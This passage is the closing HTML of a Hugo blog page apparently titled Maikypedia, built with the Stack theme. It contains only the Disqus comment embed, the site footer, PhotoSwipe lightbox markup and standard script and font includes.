        s.src = '//' + "hugo-theme-stack" + '.disqus.com/embed.js';
        s.setAttribute('data-timestamp', +new Date());
        (d.head || d.body).appendChild(s);
    })();
</script>
<noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript>
<a href="https://disqus.com" class="dsq-brlink">comments powered by <span class="logo-disqus">Disqus</span></a>
</div>

<style>
    .disqus-container {
        background-color: var(--card-background);
        border-radius: var(--card-border-radius);
        box-shadow: var(--shadow-l1);
        padding: var(--card-padding);
    }
</style>

<script>
    window.addEventListener('onColorSchemeChange', (e) => {
        if (DISQUS) {
            DISQUS.reset({
                reload: true
            });
        }
    })
</script>

    

    <footer class="site-footer">
    <section class="copyright">
        &copy; 
        
            2020 - 
        
        2021 Maikypedia
    </section>
    
    <section class="powerby">
        Built with <a href="https://gohugo.io/" target="_blank" rel="noopener">Hugo</a> <br />
        Theme <b><a href="https://github.com/CaiJimmy/hugo-theme-stack" target="_blank" rel="noopener" data-version="2.3.0">Stack</a></b> designed by <a href="https://jimmycai.com" target="_blank" rel="noopener">Jimmy</a>
    </section>
</footer>

    
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">

    
    <div class="pswp__bg"></div>

    
    <div class="pswp__scroll-wrap">

        
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>

        
        <div class="pswp__ui pswp__ui--hidden">

            <div class="pswp__top-bar">

                

                <div class="pswp__counter"></div>

                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>

                <button class="pswp__button pswp__button--share" title="Share"></button>

                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>

                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>

                
                
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                        <div class="pswp__preloader__cut">
                            <div class="pswp__preloader__donut"></div>
                        </div>
                    </div>
                </div>
            </div>

            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div>
            </div>

            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>

            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>

            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>

        </div>

    </div>

</div><script 
                src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.js"integrity="sha256-ePwmChbbvXbsO02lbM3HoHbSHTHFAeChekF1xKJdleo="crossorigin="anonymous"
                defer="true"
                >
            </script><script 
                src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe-ui-default.min.js"integrity="sha256-UKkzOn/w1mBxRmLLGrSeyB4e1xbrp4xylgAWb3M42pU="crossorigin="anonymous"
                defer="true"
                >
            </script><link 
                rel="stylesheet" 
                href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/default-skin/default-skin.css"integrity="sha256-c0uckgykQ9v5k&#43;IqViZOZKc47Jn7KQil4/MP3ySA3F8="crossorigin="anonymous"
            ><link 
                rel="stylesheet" 
                href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.css"integrity="sha256-SBLU4vv6CA6lHsZ1XyTdhyjJxCjPif/TRkjnsyGAGnE="crossorigin="anonymous"
            >

            </main>
        </div>
        <script 
                src="https://cdn.jsdelivr.net/npm/node-vibrant@3.1.5/dist/vibrant.min.js"integrity="sha256-5NovOZc4iwiAWTYIFiIM7DxKUXKWvpVEuMEPLzcm5/g="crossorigin="anonymous"
                defer="false"
                >
            </script><script type="text/javascript" src="/ts/main.js" defer></script>
<script>
    (function () {
        const customFont = document.createElement('link');
        customFont.href = "https://fonts.googleapis.com/css2?family=Lato:wght@300;400;700&display=swap";

        customFont.type = "text/css";
        customFont.rel = "stylesheet";

        document.head.appendChild(customFont);
    }());
</script>

    </body>
</html>
